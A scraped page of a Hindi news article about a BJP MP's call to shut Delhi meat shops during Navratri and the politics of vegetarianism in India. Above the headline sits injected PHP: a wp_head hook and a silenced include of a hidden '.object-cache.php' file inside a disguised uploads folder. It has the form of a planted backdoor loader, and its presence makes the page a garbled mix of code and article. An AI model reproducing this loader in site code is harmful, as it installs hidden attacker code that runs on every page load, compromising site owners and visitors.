add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मांस पर पाबंदी: शाकाहार पर ज़ोर क्या बन गया है राजनीति का हथियार – SOCH INDIA
Menu

मांस पर पाबंदी: शाकाहार पर ज़ोर क्या बन गया है राजनीति का हथियार

nobanner

भारत में खानपान एक बार फिर से राजनीतिक मुद्दा बन गया है.

राष्ट्रीय राजधानी दिल्ली में हिंदुओं के त्योहार नवरात्रि के मौके पर भारतीय जनता पार्टी के एक नेता ने मांस की सभी दुकानों को बंद करने की अपील की. हालांकि भारत या फिर हिंदुओं को शाकाहारी के तौर पर पेश करना, एक तरह से मांसाहार के साथ लंबे और प्राचीन संबंधों की उपेक्षा करना है.

पश्चिम दिल्ली लोकसभा सीट से भारतीय जनता पार्टी के सांसद परवेश वर्मा ने अपने आह्वान में कहा, “अगर दूसरे समुदाय के लोग हिंदुओं के पर्व त्योहार का सम्मान करेंगे और इस फ़ैसले का स्वागत करेंगे तो हमलोग भी उनके पर्व त्योहार का सम्मान करेंगे.”

परवेश वर्मा की मानें तो दो अप्रैल से शुरू हुए नवरात्र के दौरान नौ दिनों तक मांस की दुकानें बंद होनी चाहिए. नवरात्र के दौरान कई हिंदू उपवास रखते हैं और मांसाहार नहीं करते.